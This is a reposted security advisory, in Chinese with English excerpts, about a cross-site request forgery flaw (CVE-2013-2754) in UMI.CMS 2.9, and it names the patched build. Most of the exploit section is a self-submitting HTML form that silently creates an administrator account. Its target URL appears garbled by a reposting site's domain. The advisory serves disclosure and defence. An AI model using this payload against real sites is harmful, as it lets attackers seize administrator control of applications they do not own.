鸿 网 互 联 www.68idc.cn

UMI.CMS 2.9 CSRF缺陷

来源:互联网 作者:佚名 时间:2016-05-07 10:08
设计产品: UMI.CMS 作者: OOO Umisoft 影响版本: 2.9 and probably prior 已测试版本: 2.9 修复: 开发者已补 摘要: High-Tech Bridge Security Research Lab discovered CSRF vulnerability in UMI.CMS, which can be exploited to perform Cross-Site Requ

设计产品: UMI.CMS 

作者: OOO Umisoft 

影响版本: 2.9 and probably prior 

已测试版本: 2.9 

修复: 开发者已补

摘要:  

High-Tech Bridge Security Research Lab discovered CSRF vulnerability in UMI.CMS, which can be exploited to perform Cross-Site Request Forgery (CSRF) attacks and create new administrator in the vulnerable application. 

  

  

1) Cross-site Request Forgery (CSRF) in UMI.CMS: CVE-2013-2754 

  

The application allows authorized administrator to perform certain sensitive actions via HTTP requests without making proper validity checks to verify the source of these HTTP requests. This can be exploited to perform any actions with administrator privileges, such as adding new administrator to the system. 

  

A remote attacker can create a specially crafted webpage, trick a logged-in administrator to open it and create new user with administrative privileges. 

  

A basic CSRF exploit below will create new administrator with "csrfuser" as a login and "password" as a password: 

  

  

<form action="http:// www.2cto.com admin/users/add/user/do/" method="post" name="main"> 

<input type="hidden" name="data[new][login]"        value="csrfuser"> 

<input type="hidden" name="data[new][password][]"   value="password"> 

<input type="hidden" name="data[new][e-mail]"       value="user@mail.com"> 

<input type="hidden" name="data[new][is_activated]" value="1"> 

<input type="hidden" name="data[new][fname]"        value="username"> 

<input type="hidden" name="data[new][groups][]"     value="1"> 

<input type="hidden" name="data[new][groups][]"     value="2"> 

<input type="hidden" name="" value=""> 

<input type="submit" id="btn"> 

</form> 

<script> 

document.main.submit(); 

</script> 

解决方案:

升级到 UMI.CMS 2.9 build 21905 

网友评论
<